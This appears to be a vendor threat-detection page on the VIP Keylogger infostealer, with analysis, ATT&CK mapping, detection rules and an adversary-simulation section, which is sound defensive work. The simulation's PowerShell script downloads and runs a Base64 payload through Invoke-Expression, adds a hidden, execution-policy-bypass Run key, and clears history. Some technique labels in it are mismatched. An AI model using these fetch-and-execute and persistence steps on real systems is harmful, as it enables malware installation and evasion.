Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
VIP Keylogger is a modular information-stealing threat delivered through phishing lures such as fake bank payment alerts. Its infection chain relies on malicious VBS, JavaScript, or batch-based loaders that use heavy obfuscation, steganography in PNG images, and abuse of environment variables to conceal PowerShell stages before launching the final keylogger. Once active, the malware captures credentials, screenshots, clipboard contents, and Wi-Fi passwords, then exfiltrates the data through multiple command-and-control channels. Detection efforts should focus on suspicious registry changes, unusual environment variable values, and abnormal transitions from script execution to binary payloads.
Investigation
The Splunk Threat Research Team reviewed more than 200 loader samples collected in March and April 2026, documenting their naming patterns, loader variants, and the steganographic use of PNG files for payload delivery. Researchers reproduced the deobfuscation process, identified abuse of the INTERNAL_DB_CACHE environment variable, and traced persistence to the UserInitMprLogonScript registry key. The report also mapped each observed behavior to relevant MITRE ATT&CK techniques to support detection engineering.
Mitigation
Organizations should stop the initial phishing attempts through stronger email security controls and URL filtering. Defenders should monitor creation and modification of HKCU\Environment values, especially oversized entries or use of the INTERNAL_DB_CACHE variable. Execution of script-based loaders from user-writable directories should be restricted, and PowerShell Constrained Language Mode should be enforced where possible. Endpoint security tools should also detect process injection into aspnet_compiler.exe and suspicious netsh activity.
Response
If a VIP Keylogger indicator is detected, isolate the affected host, collect volatile memory and recent process execution logs, and hunt for the known registry artifacts, PNG-based command-and-control URLs, and dropped files. The malicious scripts should be removed, exposed credentials reset, and a broader sweep should be conducted across the environment for related loader artifacts and persistence mechanisms.
"graph TB %% Class definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef operator fill:#ff9900 %% Nodes initial_access["<b>Action</b> – <b>T1566 Phishing</b><br/>Malicious .vbs/.js/.bat delivered via email"] class initial_access action execution["<b>Action</b> – <b>T1059.005 Visual Basic</b>, <b>T1059.007 JavaScript</b>, <b>T1059.001 PowerShell</b><br/>Script stagers executed on the host"] class execution action obfuscation["<b>Action</b> – <b>T1027.016 Junk Code Insertion</b>, <b>T1027.003 Steganography</b>, <b>T1027.009 Embedded Payloads</b><br/>Payloads hidden or disguised"] class obfuscation action persistence["<b>Action</b> – <b>T1574.007 Hijack Execution Flow</b> via Registry Logon Script (UserInitMprLogonScript)<br/><b>T1037.001 Boot Logon Init Script</b><br/>Ensures code runs at logon"] class persistence action priv_esc["<b>Action</b> – <b>T1055.002 Process Injection PE</b>, <b>T1055.001 DLL Injection</b>, <b>T1620 Reflective Code Loading</b><br/>Escalates privileges and evades defenses"] class priv_esc action credential_access["<b>Action</b> – <b>T1555.003 Browser Data</b>, <b>T1056.001 Keylogging</b>, <b>T1115 Clipboard Hijacking</b><br/>Collects user credentials"] class credential_access action discovery["<b>Action</b> – <b>T1596.005 External IP Discovery</b> via public services<br/><b>T1016.002 Wiu2011Fi Password Discovery</b><br/>Gathers network information"] class discovery action collection["<b>Action</b> – <b>T1113 Screen Capture</b><br/>Collects visual data from the desktop"] class collection action c2["<b>Action</b> – <b>T1071.001 Web Protocols</b> and Telegram bot API<br/>Provides remote command and control"] class c2 action defense_evasion["<b>Action</b> – <b>T1070.004 File Deletion</b>, <b>T1070.010 Indicator Removal</b><br/>Removes evidence after operation"] class defense_evasion action %% Connections showing attack flow initial_access –>|leads_to| execution execution –>|leads_to| obfuscation obfuscation –>|leads_to| persistence persistence –>|leads_to| priv_esc priv_esc –>|leads_to| credential_access credential_access –>|leads_to| discovery discovery –>|leads_to| collection collection –>|leads_to| c2 c2 –>|leads_to| defense_evasion "
Attack Flow
Detections
Possible IP Lookup Domain Communications Attempted (via dns)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
View
LOLBAS WScript / CScript (via process_creation)
View
Suspicious Powershell Strings (via powershell)
View
Call Suspicious .NET Methods from Powershell (via powershell)
View
Possible Telegram Abuse As Command And Control Channel (via dns_query)
View
IOCs (HashSha256) to detect: Behind the Code: The Layered Defense-Evasion of VIP Keylogger
View
VIP Keylogger PowerShell Execution via Environment Variable [Windows Powershell]
View
VIP Keylogger Persistence via Registry Modification [Windows Registry Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
- Initial Recon – the attacker runs
Get-ADDomain(T1016.002) to discover domain trust relationships. - Payload Acquisition – using
Invoke-WebRequest(T1071.001) the attacker downloads a Base64‑encoded DLL that implements the keylogger (T1056.001). - Staging via Environment Variable – the downloaded string is stored in a user‑level environment variable through
[Environment]::SetEnvironmentVariable. This step satisfies the detection rule’s focus on environment‑variable manipulation. - Dynamic Execution – the attacker immediately executes the payload with
Invoke-Expression $env:VIPPayload(T1059.001). The keylogger begins capturing keystrokes, screenshots (T1113), and clipboard data (T1115). - Cleanup – after establishing persistence (e.g., creating a Run key, T1037.001), the attacker deletes the temporary DLL from disk (T1070.004) and removes the environment variable to reduce forensic footprint.
- Initial Recon – the attacker runs
-
Regression Test Script: The script below reproduces the exact steps and generates the telemetry the Sigma rule expects.
# VIP Keylogger Simulation – PowerShell # ------------------------------------------------- # 1. Download a dummy payload (Base64‑encoded string) $payloadUrl = "https://raw.githubusercontent.com/example/dummy-keylogger/main/payload.b64" $b64Payload = (Invoke-WebRequest -Uri $payloadUrl -UseBasicParsing).Content.Trim() # 2. Store payload in a user‑level environment variable $envVarName = "VIPPayload" [Environment]::SetEnvironmentVariable($envVarName, $b64Payload, "User") # 3. Decode and execute the payload via Invoke‑Expression $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64Payload)) Invoke-Expression $decoded # 4. (Optional) Persist via Run key – demonstrates T1037.001 $runKey = "HKCU:SoftwareMicrosoftWindowsCurrentVersionRun" Set-ItemProperty -Path $runKey -Name "VIPKeylogger" -Value "powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command `"Invoke-Expression $env:$envVarName`"" # 5. Cleanup – remove the environment variable and the Run key entry Start-Sleep -Seconds 30 # allow some activity to be logged Remove-ItemProperty -Path $runKey -Name "VIPKeylogger" -ErrorAction SilentlyContinue [Environment]::SetEnvironmentVariable($envVarName, $null, "User") -
Cleanup Commands: Run these commands to return the system to a pristine state after the test.
# Remove the environment variable created for the test [Environment]::SetEnvironmentVariable("VIPPayload", $null, "User") # Delete the persistence Run key entry if it exists $runKey = "HKCU:SoftwareMicrosoftWindowsCurrentVersionRun" Remove-ItemProperty -Path $runKey -Name "VIPKeylogger" -ErrorAction SilentlyContinue # Clear any residual PowerShell history entries (optional) Clear-History